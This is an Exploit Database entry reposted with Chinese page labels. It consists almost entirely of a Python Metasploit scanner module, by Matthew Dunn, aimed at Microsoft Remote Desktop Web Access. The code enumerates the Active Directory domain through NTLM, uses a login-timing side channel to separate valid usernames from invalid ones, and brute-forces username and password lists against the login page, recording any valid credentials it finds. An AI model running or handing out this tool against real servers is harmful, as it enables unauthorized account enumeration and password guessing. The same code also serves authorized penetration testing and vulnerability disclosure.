Remote Desktop Web Access – Authentication Timing Attack (Metasploit Module)

• Exploit Database
• 12 阅读

• 作者： Matthew Dunn
  日期： 2021-02-26
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49599/

• #!/usr/bin/env python3
  # -*- coding: utf-8 -*-
  
  # standard modules
  from metasploit import module
  
  # extra modules
  DEPENDENCIES_MISSING = False
  try:
  import base64
  import itertools
  import os
  import requests
  except ImportError:
  DEPENDENCIES_MISSING = True
  
  
  # Metasploit Metadata
  metadata = {
  'name': 'Microsoft RDP Web Client Login Enumeration',
  'description': '''
  Enumerate valid usernames and passwords against a Microsoft RDP Web Client
  by attempting authentication and performing a timing based check
  against the provided username.
  ''',
  'authors': [
  'Matthew Dunn'
  ],
  'date': '2020-12-23',
  'license': 'MSF_LICENSE',
  'references': [
  {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
  ],
  'type': 'single_scanner',
  'options': {
  'targeturi': {'type': 'string',
  'description': 'The base path to the RDP Web Client install',
  'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
  'rport': {'type': 'port', 'description': 'Port to target',
  'required': True, 'default': 443},
  'domain': {'type': 'string', 'description': 'The target AD domain',
   'required': False, 'default': None},
  'username': {'type': 'string',
   'description': 'The username to verify or path to a file of usernames',
   'required': True, 'default': None},
  'password': {'type': 'string',
   'description': 'The password to try or path to a file of passwords',
   'required': False, 'default': None},
  'timeout': {'type': 'int',
  'description': 'Response timeout in milliseconds to consider username invalid',
  'required': True, 'default': 1250},
  'enum_domain': {'type': 'bool',
  'description': 'Automatically enumerate AD domain using NTLM',
  'required': False, 'default': True},
  'verify_service': {'type': 'bool',
   'description': 'Verify the service is up before performing login scan',
   'required': False, 'default': True},
  'user_agent': {'type': 'string',
   'description': 'User Agent string to use, defaults to Firefox',
   'required': False,
   'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
  }
  }
  
  
  def verify_service(rhost, rport, targeturi, timeout, user_agent):
  """Verify the service is up at the target URI within the specified timeout"""
  url = f'https://{rhost}:{rport}/{targeturi}'
  headers = {'Host':rhost,
   'User-Agent': user_agent}
  try:
  request = requests.get(url, headers=headers, timeout=(timeout / 1000),
   verify=False, allow_redirects=False)
  return request.status_code == 200 and 'RDWeb' in request.text
  except requests.exceptions.Timeout:
  return False
  except Exception as exc:
  module.log(str(exc), level='error')
  return False
  
  
  def get_ad_domain(rhost, rport, user_agent):
  """Retrieve the NTLM domain out of a specific challenge/response"""
  domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB',
   'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
  headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==',
   'User-Agent': user_agent,
   'Host': rhost}
  session = requests.Session()
  for url in domain_urls:
  target_url = f"https://{rhost}:{rport}/{url}"
  request = session.get(target_url, headers=headers, verify=False)
  # Decode the provided NTLM Response to strip out the domain name
  if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
  'NTLM' in request.headers['WWW-Authenticate']:
  domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
  domain = base64.b64decode(bytes(domain_hash,
  'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
  domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
  module.log(f'Found Domain: {domain}', level='good')
  return domain
  module.log('Failed to find Domain', level='error')
  return None
  
  
  def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent):
  """Check a single login against the RDWeb Client
  The timeout is used to specify the amount of milliseconds where a
  response should consider the username invalid."""
  
  url = f'https://{rhost}:{rport}/{targeturi}'
  body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
  headers = {'Host':rhost,
   'User-Agent': user_agent,
   'Content-Type': 'application/x-www-form-urlencoded',
   'Content-Length': f'{len(body)}',
   'Origin': f'https://{rhost}'}
  session = requests.Session()
  report_data = {'domain':domain, 'address': rhost, 'port': rport,
   'protocol': 'tcp', 'service_name':'RDWeb'}
  try:
  request = session.post(url, data=body, headers=headers,
   timeout=(timeout / 1000), verify=False, allow_redirects=False)
  if request.status_code == 302:
  module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
  module.report_correct_password(username, password, **report_data)
  elif request.status_code == 200:
  module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
   level='good')
  module.report_valid_username(username, **report_data)
  else:
  module.log(f'Received unknown response with status code: {request.status_code}')
  except requests.exceptions.Timeout:
  module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds',
   level='error')
  except requests.exceptions.RequestException as exc:
  module.log('{}'.format(exc), level='error')
  return
  
  
  def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent):
  """Check each username and password combination"""
  for (username, password) in list(itertools.product(usernames, passwords)):
  check_login(rhost, rport, targeturi, domain,
  username.strip(), password.strip(), timeout, user_agent)
  
  def run(args):
  """Run the module, gathering the domain if desired and verifying usernames and passwords"""
  module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
  if DEPENDENCIES_MISSING:
  module.log('Module dependencies are missing, cannot continue', level='error')
  return
  
  user_agent = args['user_agent']
  # Verify the service is up if requested
  if args['verify_service']:
  service_verified = verify_service(args['RHOSTS'], args['rport'],
  args['targeturi'], int(args['timeout']), user_agent)
  if service_verified:
  module.log('Service is up, beginning scan...', level='good')
  else:
  module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds',
   level='error')
  return
  
  # Gather AD Domain either from args or enumeration
  domain = args['domain'] if 'domain' in args else None
  if not domain and args['enum_domain']:
  domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)
  
  # Verify we have a proper domain
  if not domain:
  module.log('Either domain or enum_domain must be set to continue, aborting...',
   level='error')
  return
  
  # Gather usernames and passwords for enumeration
  if os.path.isfile(args['username']):
  with open(args['username'], 'r') as file_contents:
  usernames = file_contents.readlines()
  else:
  usernames = [args['username']]
  if 'password' in args and os.path.isfile(args['password']):
  with open(args['password'], 'r') as file_contents:
  passwords = file_contents.readlines()
  elif 'password' in args and args['password']:
  passwords = [args['password']]
  else:
  passwords = ['wrong']
  # Check each valid login combination
  check_logins(args['RHOSTS'], args['rport'], args['targeturi'],
   domain, usernames, passwords, int(args['timeout']), user_agent)
  
  if __name__ == '__main__':
  module.run(metadata, run)